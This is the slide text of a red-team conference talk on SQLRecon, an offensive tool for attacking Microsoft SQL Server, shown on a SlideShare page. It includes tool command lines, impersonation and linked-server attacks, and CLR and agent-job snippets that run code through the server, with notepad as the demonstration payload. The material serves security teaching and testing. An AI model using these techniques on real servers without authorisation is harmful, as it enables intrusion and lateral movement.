SlideShare a Scribd company logo

Abusing MS SQL Using SQLRecon

Sanjiv Kawa
Sanjiv Kawa

Way West Hackin' Fest 2022

Technology
1 of 50
Download to read offline
Abusing MS SQL Using SQLRecon Sanjiv Kawa Adversary Simulation, IBM X-Force Red May 6, 2022
whoami? IBM Security / © 2022 IBM Corporation 2 Role » Adversary Simulation, IBM X-Force Red Hobbies
Agenda 3 IBM Security / © 2022 IBM Corporation Introducing SQLRecon 3 min Demo 1: Basic Modules 2 min Demo 2: Impersonation Attacks 4 min Demo 3: Attacking Linked SQL Servers 4 min Development Roadmap 1 min Conclusion & Questions 1 min
Introducing SQLRecon IBM Security / © 2022 IBM Corporation 4
What’s currently available? 5 IBM Security / © 2022 IBM Corporation A good amount of offensive MS SQL tools already exists – metasploit – crackmapexec – PowerUpSQL
How did this research come about? 6 IBM Security / © 2022 IBM Corporation Like most tooling … to solve a problem encountered on an engagement Also to address the MS SQL C# post-exploitation tooling gap – Modernize the approach – Works with a diverse set of C2 frameworks – execute-assembly and InlineExecute-Assembly compatible
Why bother attacking MS SQL? 7 IBM Security / © 2022 IBM Corporation Often overlooked Often misconfigured BuiltinUsers can connect to MS SQL servers by default, and: – Execute basic SQL commands – Determine rights via user mapping/roles -> impersonation attacks – UNC path injection. Creds or SMB relay -> code execution – Piggyback off rights to compromise linked servers
Demo Time IBM Security / © 2022 IBM Corporation 8
Demo 1: Basic Modules IBM Security / © 2022 IBM Corporation 9
10 IBM Security / © 2022 IBM Corporation 1. Set an authentication context 2. Supply a module SQLRecon.exe -a Windows –s SQL01 –d msdb –m whoami SQLRecon.exe -a Local –s SQL01 –d msdb –u sa –p Password123 –m whoami SQLRecon.exe -a Azure –r domain.com –d msdb –u jsmith –p Password123 –m whoami Usage
11 IBM Security / © 2022 IBM Corporation Demo Context
12 IBM Security / © 2022 IBM Corporation query whoami databases tables search smb Plenty more … (SQLRecon.exe –h) Basic Modules
13 IBM Security / © 2022 IBM Corporation Privilege Check
14 IBM Security / © 2022 IBM Corporation whoami
15 IBM Security / © 2022 IBM Corporation whoami ctd.
16 IBM Security / © 2022 IBM Corporation databases
17 IBM Security / © 2022 IBM Corporation tables
18 IBM Security / © 2022 IBM Corporation search
19 IBM Security / © 2022 IBM Corporation query
20 IBM Security / © 2022 IBM Corporation smb
Demo 2: Impersonation Attacks IBM Security / © 2022 IBM Corporation 21
22 IBM Security / © 2022 IBM Corporation Demo Configuration - Impersonation Impersonate is a special permission Enables a user or group to: - Operate with the permissions of another user; - As well as their own permissions.
23 IBM Security / © 2022 IBM Corporation SQLRecon.exe -a Windows –s SQL02 –d master –m impersonate SQLRecon.exe -a Windows –s SQL02 –d master –m iwhoami –i sa Impersonation
24 IBM Security / © 2022 IBM Corporation impersonate
25 IBM Security / © 2022 IBM Corporation using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void BaconTime () { } } https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 Custom CLR Assemblies
26 IBM Security / © 2022 IBM Corporation using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void BaconTime () { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } } https://gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce https://gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 Custom CLR Assemblies
27 IBM Security / © 2022 IBM Corporation ienableclr
28 IBM Security / © 2022 IBM Corporation Upload DLL to disk
29 IBM Security / © 2022 IBM Corporation iclr
30 IBM Security / © 2022 IBM Corporation idisableclr
31 IBM Security / © 2022 IBM Corporation Caveat: - SQL Agent must be running - Does not work with SQL Server Express edition - Works with: Developer, Standard and Enterprise editions Agent Jobs
32 IBM Security / © 2022 IBM Corporation iagentstatus
33 IBM Security / © 2022 IBM Corporation EXEC dbo.sp_add_job @job_name = 'test_ps_job1'; EXEC sp_add_jobstep @job_name = 'test_ps_job1', @step_name = 'test_ps_name1', @subsystem = 'PowerShell', @command = 'powershell.exe start-process notepad', @retry_attempts = 1, @retry_interval = 5; EXEC dbo.sp_add_jobserver @job_name = 'test_ps_job1'; EXEC dbo.sp_start_job 'test_ps_job1'; WAITFOR DELAY '00:00:05'; EXEC dbo.sp_delete_job @job_name = 'test_ps_job1'; Agent Jobs
34 IBM Security / © 2022 IBM Corporation iagentcmd
Demo 3: Attacking Linked SQL Servers IBM Security / © 2022 IBM Corporation 35
36 IBM Security / © 2022 IBM Corporation Demo Configuration - Links SQL02 might be segmented from the network you’re on A link could exist from SQL01 -> SQL02 Leverage SQL01 to issue queries on SQL02
37 IBM Security / © 2022 IBM Corporation SQLRecon.exe -a Windows –s SQL01 –d master –m links SQLRecon.exe -a Windows –s SQL01 –d master –m lwhoami –l SQL02 Linked SQL Servers
38 IBM Security / © 2022 IBM Corporation links SQLRecon.exe -a Windows –s SQL01 –d master –m links
39 IBM Security / © 2022 IBM Corporation lwhoami
40 IBM Security / © 2022 IBM Corporation ldatabases
41 IBM Security / © 2022 IBM Corporation ltables
42 IBM Security / © 2022 IBM Corporation lenableole
43 IBM Security / © 2022 IBM Corporation lolecmd
44 IBM Security / © 2022 IBM Corporation ldisableole
45 IBM Security / © 2022 IBM Corporation lsmb
Development Roadmap IBM Security / © 2022 IBM Corporation 46
47 IBM Security / © 2022 IBM Corporation - Expand Command Execution Techniques To Do’s Execution Technique Standard Impersonation Linked xp_cmdshell ✅ ✅ ✅ OLE Automation ✅ ✅ ✅ Custom CLR Assemblies ✅ ✅ ❌ Agent Jobs ✅ ✅ ❌
Conclusion IBM Security / © 2022 IBM Corporation 48
49 IBM Security / © 2022 IBM Corporation Address the MS SQL C# post-exploitation tooling gap Helps operators using C2 frameworks perform MS SQL attacks Conclusion & Questions @sanjivkawa github.com/skahwah/SQLRecon
Abusing MS SQL Using SQLRecon

Recommended

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconDEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconBlack Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATANikhil Mittal
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
Drone CI/CD 自動化測試及部署
Drone CI/CD 自動化測試及部署Drone CI/CD 自動化測試及部署
Drone CI/CD 自動化測試及部署Bo-Yi Wu
 

Recommended

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconDEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon
DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconBlack Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon
Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLReconSanjiv Kawa
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATANikhil Mittal
 
Expanding the control over the operating system from the database
Expanding the control over the operating system from the databaseExpanding the control over the operating system from the database
Expanding the control over the operating system from the databaseBernardo Damele A. G.
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Advanced SQL injection to operating system full control (whitepaper)
Advanced SQL injection to operating system full control (whitepaper)Bernardo Damele A. G.
 
Drone CI/CD 自動化測試及部署
Drone CI/CD 自動化測試及部署Drone CI/CD 自動化測試及部署
Drone CI/CD 自動化測試及部署Bo-Yi Wu
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution64 Methods for Mimikatz Execution
64 Methods for Mimikatz ExecutionHadess
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
Docker Container Security
Docker Container SecurityDocker Container Security
Docker Container SecuritySuraj Khetani
 
DevOps - Interview Question.pdf
DevOps - Interview Question.pdfDevOps - Interview Question.pdf
DevOps - Interview Question.pdfMinhTrnNht7
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practicesSharon Vendrov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsWill Schroeder
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Aqua Security
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Setting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in KubernetesSetting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in KubernetesElizabeth Yu, MBA
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp VaultChickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp VaultJeff Horwitz
 
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...Sharon James
 
Automated CI with AEM Cloud service
Automated CI with AEM Cloud serviceAutomated CI with AEM Cloud service
Automated CI with AEM Cloud serviceJakub Wadolowski
 

More Related Content

What's hot

Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentTeymur Kheirkhabarov
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution64 Methods for Mimikatz Execution
64 Methods for Mimikatz ExecutionHadess
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking themMikhail Egorov
 
Docker Container Security
Docker Container SecurityDocker Container Security
Docker Container SecuritySuraj Khetani
 
DevOps - Interview Question.pdf
DevOps - Interview Question.pdfDevOps - Interview Question.pdf
DevOps - Interview Question.pdfMinhTrnNht7
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practicesSharon Vendrov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosén
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsWill Schroeder
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePassWill Schroeder
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Aqua Security
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Setting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in KubernetesSetting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in KubernetesElizabeth Yu, MBA
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp VaultChickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp VaultJeff Horwitz
 

What's hot (20)

Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution64 Methods for Mimikatz Execution
64 Methods for Mimikatz Execution
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 
Docker Container Security
Docker Container SecurityDocker Container Security
Docker Container Security
 
DevOps - Interview Question.pdf
DevOps - Interview Question.pdfDevOps - Interview Question.pdf
DevOps - Interview Question.pdf
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security DescriptorsAn ACE in the Hole - Stealthy Host Persistence via Security Descriptors
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
Sql injection
Sql injectionSql injection
Sql injection
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Setting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in KubernetesSetting up MySQL Replication Cluster in Kubernetes
Setting up MySQL Replication Cluster in Kubernetes
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp VaultChickens & Eggs: Managing secrets in AWS with Hashicorp Vault
Chickens & Eggs: Managing secrets in AWS with Hashicorp Vault
 

Similar to Abusing MS SQL Using SQLRecon

Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...Sharon James
 
Automated CI with AEM Cloud service
Automated CI with AEM Cloud serviceAutomated CI with AEM Cloud service
Automated CI with AEM Cloud serviceJakub Wadolowski
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL ServerScott Sutherland
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerScott Sutherland
 
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerBeyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerNetSPI
 
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013MattKilner
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013MattKilner
 
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, FasterSaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, FasterThomas Jackson
 
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...William Holmes
 
resilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptxresilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptxmodathernady
 
Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726Rohit Kelapure
 
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)philipdurbin
 
Tips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS ApplicationsTips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS ApplicationsStrongback Consulting
 
Modularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java AppModularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java AppDinakar Guniguntala
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...Carl Tyler
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksIBM Security
 
The enterprise manager command line interface2
The enterprise manager command line interface2The enterprise manager command line interface2
The enterprise manager command line interface2Kellyn Pot'Vin-Gorman
 

Similar to Abusing MS SQL Using SQLRecon (20)

Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
Bp307 Practical Solutions for Connections Administrators, tips and scrips for...
 
Automated CI with AEM Cloud service
Automated CI with AEM Cloud serviceAutomated CI with AEM Cloud service
Automated CI with AEM Cloud service
 
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
2018 Student360 - Beyond xp_cmdshell - Owning the Empire Through SQL Server
 
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL ServerSecure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
Secure360 - Beyond xp cmdshell - Owning the Empire through SQL Server
 
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL ServerBeyond XP_CMDSHELL: Owning the Empire Through SQL Server
Beyond XP_CMDSHELL: Owning the Empire Through SQL Server
 
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013Windows Debugging Tools - JavaOne 2013
Windows Debugging Tools - JavaOne 2013
 
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, FasterSaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
SaltConf 2015: Salt stack at web scale: Better, Stronger, Faster
 
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
IBM Lotusphere 2013 AD109: Using the IBM® Sametime® Proxy SDK: WebSphere Port...
 
resilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptxresilient_training_labs v12 copy.pptx
resilient_training_labs v12 copy.pptx
 
Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726Wsadminlib.wasug.2011 0125-0726
Wsadminlib.wasug.2011 0125-0726
 
Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)Command pattern vs. MVC: Lean Beans (are made of this)
Command pattern vs. MVC: Lean Beans (are made of this)
 
Tips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS ApplicationsTips for Developing and Testing IBM HATS Applications
Tips for Developing and Testing IBM HATS Applications
 
Modularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java AppModularizing AcmeAir: A case study in modularizing a Java App
Modularizing AcmeAir: A case study in modularizing a Java App
 
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
AD109 - Using the IBM Sametime Proxy SDK: WebSphere Portal, IBM Connections -...
 
2) security
2) security2) security
2) security
 
Using Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style AttacksUsing Massively Distributed Malware in APT-Style Attacks
Using Massively Distributed Malware in APT-Style Attacks
 
TSRT Crashes
TSRT CrashesTSRT Crashes
TSRT Crashes
 
The enterprise manager command line interface2
The enterprise manager command line interface2The enterprise manager command line interface2
The enterprise manager command line interface2
 

Recently uploaded

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024Top 10 Most Downloaded Games on Play Store in 2024
Top 10 Most Downloaded Games on Play Store in 2024SynarionITSolutions
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdflior mazor
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024The Digital Insurer
 
Powerful Google developer tools for immediate impact! (2023-24 C)
